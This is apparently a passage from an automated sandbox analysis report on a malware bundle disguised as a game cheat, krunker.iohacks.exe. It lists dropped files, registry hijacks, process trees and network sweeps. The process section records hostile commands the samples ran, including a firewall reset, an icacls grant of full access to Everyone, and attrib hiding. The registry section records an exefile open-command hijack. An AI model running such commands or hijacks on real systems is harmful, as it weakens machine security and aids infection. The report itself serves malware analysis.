File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\px8A1A.tmp C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5AE4BE3E-AF3D-11EE-9016-765658A41E32} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2624 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 1812 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 1812 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 1812 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 1812 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 1812 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 1812 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 3636 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3636 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3636 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 428 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 1812 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 1812 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 428 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 428 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 1812 wrote to memory of 3828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 1812 wrote to memory of 3828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 1812 wrote to memory of 3828 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 3828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 3828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 3828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 4640 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 4640 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 4640 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\attrib.exe
PID 4640 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 4640 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 4640 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 232 wrote to memory of 2628 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\System32\cmd.exe
PID 232 wrote to memory of 2628 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\System32\cmd.exe
PID 4260 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe C:\Windows\svchost.com
PID 4260 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe C:\Windows\svchost.com
PID 4260 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe C:\Windows\svchost.com
PID 4064 wrote to memory of 4204 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE
PID 4064 wrote to memory of 4204 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE
PID 4064 wrote to memory of 4204 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE
PID 2212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 2212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 2212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 1812 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 1812 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 1812 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 2212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 2212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe C:\Windows\svchost.com
PID 2252 wrote to memory of 4696 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
PID 2252 wrote to memory of 4696 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
PID 2252 wrote to memory of 4696 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
PID 2260 wrote to memory of 3708 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
PID 2260 wrote to memory of 3708 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
PID 2260 wrote to memory of 3708 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
PID 4696 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
PID 4696 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

"4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

"bot.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

"[email protected]"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

"RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\Desktop\1.exe

"C:\Users\Admin\Desktop\1.exe"

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\83F0.tmp\848E.tmp\848F.bat C:\Users\Admin\Desktop\1.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

"ska2pwej.aeh.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Users\Admin\AppData\Local\TEMPSP~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

"x2s443bc.cs1.exe"

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe

"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"

C:\Users\Admin\AppData\Local\Temp\is-I1ATN.tmp\ska2pwej.aeh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-I1ATN.tmp\ska2pwej.aeh.tmp" /SL5="$3029E,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2580 CREDAT:82945 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

taskdl.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Users\Admin\AppData\Local\Temp\is-1LPUI.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1LPUI.tmp\x2s443bc.cs1.tmp" /SL5="$B0060,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\89AD.tmp\splitterrypted.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 88381704838868.bat

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\8B72.tmp\spwak.vbs

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
SE 171.25.193.9:80 tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 9.193.25.171.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
N/A 127.0.0.1:49838 tcp
US 8.8.8.8:53 d1.udashi.com udp
CN 36.248.64.77:80 d1.udashi.com tcp
US 8.8.8.8:53 77.64.248.36.in-addr.arpa udp
IE 93.107.12.0:6893 udp
IE 93.107.12.1:6893 udp
IE 93.107.12.2:6893 udp
IE 93.107.12.3:6893 udp
IE 93.107.12.4:6893 udp
IE 93.107.12.5:6893 udp
IE 93.107.12.6:6893 udp
IE 93.107.12.7:6893 udp
IE 93.107.12.8:6893 udp
IE 93.107.12.9:6893 udp
IE 93.107.12.10:6893 udp
IE 93.107.12.11:6893 udp
IE 93.107.12.12:6893 udp
IE 93.107.12.13:6893 udp
IE 93.107.12.14:6893 udp
IE 93.107.12.15:6893 udp
IE 93.107.12.16:6893 udp
IE 93.107.12.17:6893 udp
IE 93.107.12.18:6893 udp
IE 93.107.12.19:6893 udp
IE 93.107.12.20:6893 udp
IE 93.107.12.21:6893 udp
IE 93.107.12.22:6893 udp
IE 93.107.12.23:6893 udp
IE 93.107.12.24:6893 udp
IE 93.107.12.25:6893 udp
IE 93.107.12.26:6893 udp
IE 93.107.12.27:6893 udp
IE 93.107.12.28:6893 udp
IE 93.107.12.29:6893 udp
IE 93.107.12.30:6893 udp
IE 93.107.12.31:6893 udp
TR 95.1.200.0:6893 udp
TR 95.1.200.1:6893 udp
TR 95.1.200.2:6893 udp
TR 95.1.200.3:6893 udp
TR 95.1.200.4:6893 udp
TR 95.1.200.5:6893 udp
TR 95.1.200.6:6893 udp
TR 95.1.200.7:6893 udp
TR 95.1.200.8:6893 udp
TR 95.1.200.9:6893 udp
TR 95.1.200.10:6893 udp
TR 95.1.200.11:6893 udp
TR 95.1.200.12:6893 udp
TR 95.1.200.13:6893 udp
TR 95.1.200.14:6893 udp
TR 95.1.200.15:6893 udp
TR 95.1.200.16:6893 udp
TR 95.1.200.17:6893 udp
TR 95.1.200.18:6893 udp
TR 95.1.200.19:6893 udp
TR 95.1.200.20:6893 udp
TR 95.1.200.21:6893 udp
TR 95.1.200.22:6893 udp
TR 95.1.200.23:6893 udp
TR 95.1.200.24:6893 udp
TR 95.1.200.25:6893 udp
TR 95.1.200.26:6893 udp
TR 95.1.200.27:6893 udp
TR 95.1.200.28:6893 udp
TR 95.1.200.29:6893 udp
TR 95.1.200.30:6893 udp
TR 95.1.200.31:6893 udp
FR 87.98.176.0:6893 udp
FR 87.98.176.1:6893 udp
FR 87.98.176.2:6893 udp
FR 87.98.176.3:6893 udp
FR 87.98.176.4:6893 udp
FR 87.98.176.5:6893 udp
FR 87.98.176.6:6893 udp
FR 87.98.176.7:6893 udp
FR 87.98.176.8:6893 udp
FR 87.98.176.9:6893 udp
FR 87.98.176.10:6893 udp
FR 87.98.176.11:6893 udp
FR 87.98.176.12:6893 udp
FR 87.98.176.13:6893 udp
FR 87.98.176.14:6893 udp
FR 87.98.176.15:6893 udp
FR 87.98.176.16:6893 udp
FR 87.98.176.17:6893 udp
FR 87.98.176.18:6893 udp
FR 87.98.176.19:6893 udp
FR 87.98.176.20:6893 udp
FR 87.98.176.21:6893 udp
FR 87.98.176.22:6893 udp
FR 87.98.176.23:6893 udp
FR 87.98.176.24:6893 udp
FR 87.98.176.25:6893 udp
FR 87.98.176.26:6893 udp
FR 87.98.176.27:6893 udp
FR 87.98.176.28:6893 udp
FR 87.98.176.29:6893 udp
FR 87.98.176.30:6893 udp
FR 87.98.176.31:6893 udp
FR 87.98.176.32:6893 udp
FR 87.98.176.33:6893 udp
FR 87.98.176.34:6893 udp
FR 87.98.176.35:6893 udp
FR 87.98.176.36:6893 udp
FR 87.98.176.37:6893 udp
FR 87.98.176.38:6893 udp
FR 87.98.176.39:6893 udp
FR 87.98.176.40:6893 udp
FR 87.98.176.41:6893 udp
FR 87.98.176.42:6893 udp
FR 87.98.176.43:6893 udp
FR 87.98.176.44:6893 udp
FR 87.98.176.45:6893 udp
FR 87.98.176.46:6893 udp
FR 87.98.176.47:6893 udp
FR 87.98.176.48:6893 udp
FR 87.98.176.49:6893 udp
FR 87.98.176.50:6893 udp
FR 87.98.176.51:6893 udp
FR 87.98.176.52:6893 udp
FR 87.98.176.53:6893 udp
FR 87.98.176.54:6893 udp
FR 87.98.176.55:6893 udp
FR 87.98.176.56:6893 udp
FR 87.98.176.57:6893 udp
FR 87.98.176.58:6893 udp
FR 87.98.176.59:6893 udp
FR 87.98.176.60:6893 udp
FR 87.98.176.61:6893 udp
FR 87.98.176.62:6893 udp
FR 87.98.176.63:6893 udp
FR 87.98.176.64:6893 udp
FR 87.98.176.65:6893 udp
FR 87.98.176.66:6893 udp
FR 87.98.176.67:6893 udp
FR 87.98.176.68:6893 udp
FR 87.98.176.69:6893 udp
FR 87.98.176.70:6893 udp
FR 87.98.176.71:6893 udp
FR 87.98.176.72:6893 udp
FR 87.98.176.73:6893 udp
FR 87.98.176.74:6893 udp
FR 87.98.176.75:6893 udp
FR 87.98.176.76:6893 udp
FR 87.98.176.77:6893 udp
FR 87.98.176.78:6893 udp
FR 87.98.176.79:6893 udp
FR 87.98.176.80:6893 udp
FR 87.98.176.81:6893 udp
FR 87.98.176.82:6893 udp
FR 87.98.176.83:6893 udp
FR 87.98.176.84:6893 udp
FR 87.98.176.85:6893 udp
FR 87.98.176.86:6893 udp
FR 87.98.176.87:6893 udp
FR 87.98.176.88:6893 udp
FR 87.98.176.89:6893 udp
FR 87.98.176.90:6893 udp
FR 87.98.176.91:6893 udp
FR 87.98.176.92:6893 udp
FR 87.98.176.93:6893 udp
FR 87.98.176.94:6893 udp
FR 87.98.176.95:6893 udp
FR 87.98.176.96:6893 udp
FR 87.98.176.97:6893 udp
FR 87.98.176.98:6893 udp
FR 87.98.176.99:6893 udp
FR 87.98.176.100:6893 udp
FR 87.98.176.101:6893 udp
FR 87.98.176.102:6893 udp
FR 87.98.176.103:6893 udp
FR 87.98.176.104:6893 udp
FR 87.98.176.105:6893 udp
FR 87.98.176.106:6893 udp
FR 87.98.176.107:6893 udp
FR 87.98.176.108:6893 udp
FR 87.98.176.109:6893 udp
FR 87.98.176.110:6893 udp
FR 87.98.176.111:6893 udp
FR 87.98.176.112:6893 udp
FR 87.98.176.113:6893 udp
FR 87.98.176.114:6893 udp
FR 87.98.176.115:6893 udp
FR 87.98.176.116:6893 udp
FR 87.98.176.117:6893 udp
FR 87.98.176.118:6893 udp
